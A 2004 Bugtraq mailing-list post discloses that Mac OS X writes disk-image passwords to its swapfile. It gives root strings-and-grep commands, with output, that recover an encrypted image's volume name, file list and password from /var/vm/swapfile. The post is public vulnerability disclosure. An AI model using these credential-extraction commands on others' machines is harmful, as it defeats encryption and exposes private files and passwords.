Date: 16 Jul 2004 14:51:35 -0000
From: <johnny@...ckstuff.com>
To: bugtraq@...urityfocus.com
Subject: Re: Mac OS X stores login/Keychain/FileVault passwords on disk

The issue of getting into AES128 encrypted disk images is easy to
unravel with this swapfile problem.

We'll start by grabbing the volume name of an AES128 encrypted disk
image file. Assuming the image name is test1.dmg, try:

root# strings -8 /var/vm/swapfile* | grep -B1 test1.dmg | grep
Volumes
/Volumes/SECRET

Armed with the volume name, we can grab the file listing of that
(supposedly protected) AES128 encrypted disk image.  Since our
volume name is 'SECRET'. Try:

root# strings -8 /var/vm/swapfile* | grep "<string>/Volumes/SECRET"
<string>/Volumes/SECRET/secretporn.pdf</string>
<string>/Volumes/SECRET/secretphoto.jpg</string>
<string>/Volumes/SECRET/badmovie.mpg</string>
<string>/Volumes/SECRET/horriblybadmovie.mpg</string>
<string>/Volumes/SECRET/naughty.mpg</string>
<string>/Volumes/SECRET</string>

To REALLY get at those (supposedly protected) files, we could use the
password. It's easy to grab it even if it's not in the keychain:

root# strings -8 /var/vm/swapfile* | grep -B1 "/System/Library/
CoreServices/DiskImageMounter.app"

[... snip ... ]
--
mySecretPasswordTest
/System/Library/CoreServices/DiskImageMounter.app

The only chore may be figuring out which password goes with which
disk image. And that's not nearly the chore of popping AES128
encryption...

j0hnny

http://johnny.ihackstuff.com
johnny@...ckstuff.com